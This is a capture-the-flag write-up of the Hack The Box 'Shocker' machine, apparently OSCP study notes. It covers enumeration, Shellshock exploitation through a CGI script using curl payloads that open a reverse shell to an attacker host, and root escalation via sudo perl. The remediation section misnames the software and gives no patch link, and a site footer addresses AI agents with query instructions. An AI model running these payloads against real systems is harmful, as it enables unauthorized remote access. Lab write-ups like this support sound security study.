# Shocker Writeup ![](/files/8rUuGhe55h79lr54yu2r) **Vulnerability Exploited:** GNU Bash - 'Shellshock' Environment Variable Command Injection (CVE-2014-6271) **System Vulnerable:** 10.10.10.56 V**ulnerability Explanation:** GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod\_cgi and mod\_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." **Vulnerability Fix:** The publishers of the Ability Server have issued a patch to fix this known issue. It can be found here: **Privilege Escalation Vulnerability:** Insecure service configuration **Vulnerability Fix:** You should always conform to the principle of least privilege and the concept of separation of privileges. **Severity:** **Critical** An initial nmap scan revealed the Apache version 2.4.18 running on port 8080. ``` # Nmap 7.91 scan initiated Tue Nov 16 19:03:32 2021 as: nmap -sC -sV -v -p- -oN nmap/full 10.10.10.56 Nmap scan report for 10.10.10.56 Host is up (0.34s latency). Not shown: 65521 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 3398/tcp filtered sapcomm 10044/tcp filtered unknown 15794/tcp filtered unknown 25723/tcp filtered unknown 29621/tcp filtered unknown 33041/tcp filtered unknown 36919/tcp filtered unknown 40374/tcp filtered unknown 40801/tcp filtered unknown 45501/tcp filtered unknown 48906/tcp filtered unknown 55879/tcp filtered unknown Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Nov 16 19:37:19 2021 -- 1 IP address (1 host up) scanned in 2026.90 seconds ``` The shocker main page is shown below: ![](/files/TNpV9DZ7kR4j5iPpNjRB) Fuzzing the website find any existing directories. ``` ┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker] └─# gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.56/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Add Slash: true [+] Timeout: 10s =============================================================== 2021/11/16 21:13:50 Starting gobuster in directory enumeration mode =============================================================== /cgi-bin/ (Status: 403) [Size: 294] /icons/ (Status: 403) [Size: 292] ``` The /cgi-bin/ directory gives a 403 ( You don’t have permission to access /cgi-bi/ on this server) ![](/files/69PxL53Fw1Tc2O5gFfbK) Enumerating more on the /cgi-bin/ directory and looking for files with extensions “sh” and “cgi”. ``` ┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker] └─# gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sh,cgi -f =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.56/cgi-bin [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: sh,cgi [+] Add Slash: true [+] Timeout: 10s =============================================================== 2021/11/16 21:19:12 Starting gobuster in directory enumeration mode =============================================================== /user.sh (Status: 200) [Size: 118] ``` Getting back a bash script (user.sh) that contain the content as follow: ``` Content-Type: text/plain Just an uptime test script 19:20:42 up 4:24, 0 users, load average: 0.02, 0.02, 0.00 ``` Identified an exploit for shellshock using searchsploit ![](/files/QmifreWoVZCWKGltNrZo) Used an exploit from and modified it as shown belo ``` curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -i >& /dev/tcp/10.10.16.8/9001 0>&1" http://10.10.10.56/cgi-bin/user.sh ``` Run the modified exploit ``` ┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker] └─# curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.16.8/9001 0>&1' http://10.10.10.56/cgi-bin/user.sh ``` Received a reverse shell on port 9001 as shelly ``` ┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker] └─# nc -nlvp 9001 1 ⨯ listening on [any] 9001 ... connect to [10.10.16.8] from (UNKNOWN) [10.10.10.56] 52132 bash: no job control in this shell shelly@Shocker:/usr/lib/cgi-bin$ whoami whoami shelly ``` #### user.txt ``` shelly@Shocker:/home/shelly$ cat user.txt && hostname && whoami && ip addr cat user.txt && hostname && whoami && ip addr xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Shocker shelly 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 00:50:56:b9:6e:f9 brd ff:ff:ff:ff:ff:ff inet 10.10.10.56/24 brd 10.10.10.255 scope global ens33 valid_lft forever preferred_lft forever inet6 fe80::250:56ff:feb9:6ef9/64 scope link valid_lft forever preferred_lft forever ``` Run sudo -l command to determine what permissions the use shelly have. ``` shelly@Shocker:/home/shelly$ sudo -l sudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl ``` Run a perl code using sudo to escalate the access. ``` shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'exec "/bin/sh";' sudo /usr/bin/perl -e 'exec "/bin/sh";' id uid=0(root) gid=0(root) groups=0(root) ``` #### root.txt ``` root@Shocker:~# cat root.txt && hostname && whoami && ip addr cat root.txt && hostname && whoami && ip addr xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Shocker root 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 00:50:56:b9:6e:f9 brd ff:ff:ff:ff:ff:ff inet 10.10.10.56/24 brd 10.10.10.255 scope global ens33 valid_lft forever preferred_lft forever inet6 fe80::250:56ff:feb9:6ef9/64 scope link valid_lft forever preferred_lft forever ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://w43l.gitbook.io/oscp-preparation/htb/htb-linux-boxes/shocker-writeup.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.